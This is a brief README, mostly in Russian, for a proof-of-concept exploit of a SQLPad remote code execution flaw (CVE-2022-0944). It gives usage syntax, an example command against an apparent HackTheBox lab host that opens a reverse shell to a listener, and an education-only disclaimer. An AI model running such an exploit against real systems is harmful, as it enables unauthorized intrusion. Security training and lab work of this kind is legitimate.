
Эксплойт Proof-of-concept для SQLPad RCE (CVE-2022-0944), который запускает обратную оболочку на прослушиватель, контролируемый атакующим. Предназначено для образовательного использования в области кибербезопасности.
Proof of concept эксплойт для SQLPad RCE (CVE-2022-0944), приводящий к RCE с обратной оболочкой на ПК атакующего.
usage: script.py URL IP PORT
positional arguments:
URL URL to SQLPad
IP Listener host address for reverse shell
PORT Listener port for reverse shell
Пример:
# trigger exploit
./script.py http://admin.sightless.htb 10.10.11.2 443
Этот репозиторий содержит инструменты, предназначенные исключительно для образовательных целей, а именно для использования в средах обучения кибербезопасности. Автор данного кода не несет ответственности за любые последствия, возникшие в результате использования, неправильного использования или модификации этого кода. Код предоставляется «как есть» без каких-либо гарантий, явных или подразумеваемых, включая, но не ограничиваясь, подразумеваемыми гарантиями товарной пригодности или пригодности для определенной цели.